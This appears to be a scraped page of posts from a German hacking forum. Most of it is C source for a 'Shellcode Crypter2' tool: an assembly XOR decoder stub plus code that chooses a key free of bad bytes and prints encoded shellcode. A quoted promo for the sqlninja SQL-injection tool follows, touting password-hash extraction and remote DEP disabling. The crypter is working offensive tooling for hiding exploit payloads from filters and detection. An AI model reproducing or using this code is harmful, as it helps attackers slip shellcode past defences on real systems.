00401028 EB 02                jmp         label1 (0040102c) //  ------->----+
label2:                                                     //              |
0040102A EB 05                jmp         label3 (00401031) //   v <-+      v
label1:                                                     //   |   |      |
0040102C E8 F9 FF FF FF       call        label2 (0040102a) //   |   ^  <---+
label3:                                                     //   |
00401031 58                   pop         eax               // <-+
00401032 83 C0 0E             add         eax,0Eh
label3:
00401035 80 30 X              xor         byte ptr [eax], Xor   //<---+
00401038 40                   inc         eax                   //    |
00401039 41                   inc         ecx                   //    ^
0040103A 83 F9 Y              cmp         ecx,shellcode_length  //    |
0040103D 75 F6                jne         00401035              // ---+
                              .........
                              .........                         // Crypted shellcode
                              .........
*/


int main()
{
char*flShellcode=(char*)malloc(sizeof(shellcode)+4);
int i,b,SLLen,xor,found;

  printf(&quot;Shellcode Crypter2\n Coded by Shen139\n  shen139 (at) eviltime [dot] com\n\n\n&quot;);


 
  SLLen=(SHELLCODE_LENGHT==0)?strlen(shellcode):SHELLCODE_LENGHT;

  memcpy(flShellcode,shellcode,SLLen);

#ifndef HARDCODEDXOR
  for(xor=1;xor<=0xFF;xor++)
  {
    found=1;
    for(b=0;b<SLLen;b++)
    {
      if(flShellcode[b]==xor)
      {
        found=0;
        break;
      }
    }
    if(found==1)
      break;
  }
#else
  xor=HARDCODEDXOR;
#endif

  printf(&quot; - Xoring with 0x%Xh (%dd)\n\n\n - Shellcode:\n\n&quot;,xor,xor);

  printf(MAGIC_SUFFIX_PARTa);

  printf(&quot;\\x%X&quot;,xor);

  printf(MAGIC_SUFFIX_PARTb);

  printf(&quot;\\x%X&quot;,SLLen);

  printf(MAGIC_SUFFIX_PARTc);



  for(i=0;i<SLLen;i++)
    printf(&quot;\\x%X&quot;,(unsigned char)shellcode[i]^xor);


  printf(&quot;\n\n&quot;);

  printf(&quot; + Shellcode length:\n  - Original: %i bytes\n  - Crypted : %i bytes\n\n&quot;,SLLen,SLLen+CIPHERLENGTH);

return 0;
}

/*EOF*/


14  Das Board / Hello World / Hy am: März 20, 2009, 04:00:51
welcome and happy posting Zwinkernd
15  Programmierung / Code Schnipsel / [Perl] SQLNinja am: März 20, 2009, 03:43:22
http://sqlninja.sourceforge.net/

Zitat

Fancy going from a SQL Injection to a full GUI access on the DB server? What about extracting password hashes on the fly? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have the latest release of sqlninja!
Have a look at the brand new flash demo and then feel free to download the tool. Angelo Dell'Aera and the Metasploit Development Team deserve special credit for this release. Happy hacking!!
Seiten: [1] 2
Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS